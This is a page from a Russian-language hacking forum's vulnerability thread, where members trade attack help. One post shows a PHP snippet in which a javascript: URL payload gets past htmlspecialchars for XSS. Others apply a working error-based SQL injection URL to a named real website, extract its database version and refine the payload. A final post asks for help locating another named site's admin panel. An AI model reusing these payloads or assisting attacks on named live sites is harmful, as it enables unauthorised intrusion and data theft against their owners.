HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1012 из 2438 « Первая < 125129129621002 1008 1009 1010 1011 1012 1013 1014 1015 1016 10221062111215122012 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #10111  
Старый 12.11.2009, 21:48
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
С нами:
8777275

Репутация: 3
По умолчанию
Цитата:
Сообщение от Pashkela  
1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:

PHP код:
<?php 
$a "javascript://%0adocument.write('<script>alert(0)</script>');";
$data htmlspecialchars($a); 
echo "<a href=$data>Tikni</a>";
?>
просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте
Я в шоке!!! А что делать??
 
Ответить с цитированием

  #10112  
Старый 12.11.2009, 21:54
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706

Репутация: 3338


По умолчанию
Цитата:
Сообщение от vorona  
Я в шоке!!! А что делать??
Как бы ужасно это не звучало, но htmlentities приведет к тому же результату

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся
Последний раз редактировалось Pashkela; 12.11.2009 в 21:57..
 
Ответить с цитированием

  #10113  
Старый 12.11.2009, 21:59
vorona
Участник форума
Регистрация: 07.09.2009
Сообщений: 298
С нами:
8777275

Репутация: 3
По умолчанию
Цитата:
Сообщение от Pashkela  
Как бы ужасно это не звучало, но htmlentities приведет к тому же результату

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся
strip_tags поможет в случае с выводом в ссылку или с утф-7??
 
Ответить с цитированием

  #10114  
Старый 12.11.2009, 22:01
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706

Репутация: 3338


По умолчанию
Цитата:
Сообщение от vorona  
strip_tags поможет в случае с выводом в ссылку или с утф-7??
UTF-7 сработает только если в браузере стоит автоопределение кодировки, да и то, если браузер поддерживает UTF-7 кодировку вообще. Не очень актуально для современных браузеров
 
Ответить с цитированием

  #10115  
Старый 12.11.2009, 22:07
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336

Репутация: 330
По умолчанию
Он хочет например через str_replace() заменять в передаваемых гетом/постом запросах латинские буквы на русские, чтобы если ты передаешь гетом или постом что то типа "...script" оно менялось на русские буквы и не пахало.
Это не самый лутший вариант.

Но хочу повторить: здесь раздел для обсуждения УЯЗВИМОСТЕЙ, по поводу защиты пиши в кодинг.
Последний раз редактировалось Ins3t; 12.11.2009 в 22:13..
 
Ответить с цитированием

  #10116  
Старый 12.11.2009, 22:18
fng
Новичок
Регистрация: 12.11.2009
Сообщений: 20
С нами:
8681832

Репутация: 0
По умолчанию
Посмотрите еще вот это плиз


www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700

почему так происходит?
 
Ответить с цитированием

  #10117  
Старый 12.11.2009, 22:23
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306

Репутация: 1588
По умолчанию
Цитата:
Сообщение от fng  
Посмотрите еще вот это плиз


www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700

почему так происходит?

Код:
http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)
Последний раз редактировалось [x60]unu; 12.11.2009 в 22:33..
 
Ответить с цитированием

  #10118  
Старый 12.11.2009, 22:39
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947

Репутация: 1196


По умолчанию
Цитата:
Сообщение от [x60]unu  
Код:
http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)
гуд,вот только /**/and/**/1=1/* - тут незачем
ПС слепая там
 
Ответить с цитированием

  #10119  
Старый 12.11.2009, 22:41
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306

Репутация: 1588
По умолчанию
Цитата:
Сообщение от L I G A  
гуд,вот только /**/and/**/1=1/* - тут незачем
Да /**/and/**/1=1/* разве что для обхода фильтрации, но мне так удобнее выходит
 
Ответить с цитированием

  #10120  
Старый 12.11.2009, 23:56
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961

Репутация: 8
По умолчанию
Помогите найти админку, сканером не получается.


http://www.lechaim.co.za
 
Ответить с цитированием
Ответ
Страница 1012 из 2438 « Первая < 125129129621002 1008 1009 1010 1011 1012 1013 1014 1015 1016 10221062111215122012 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.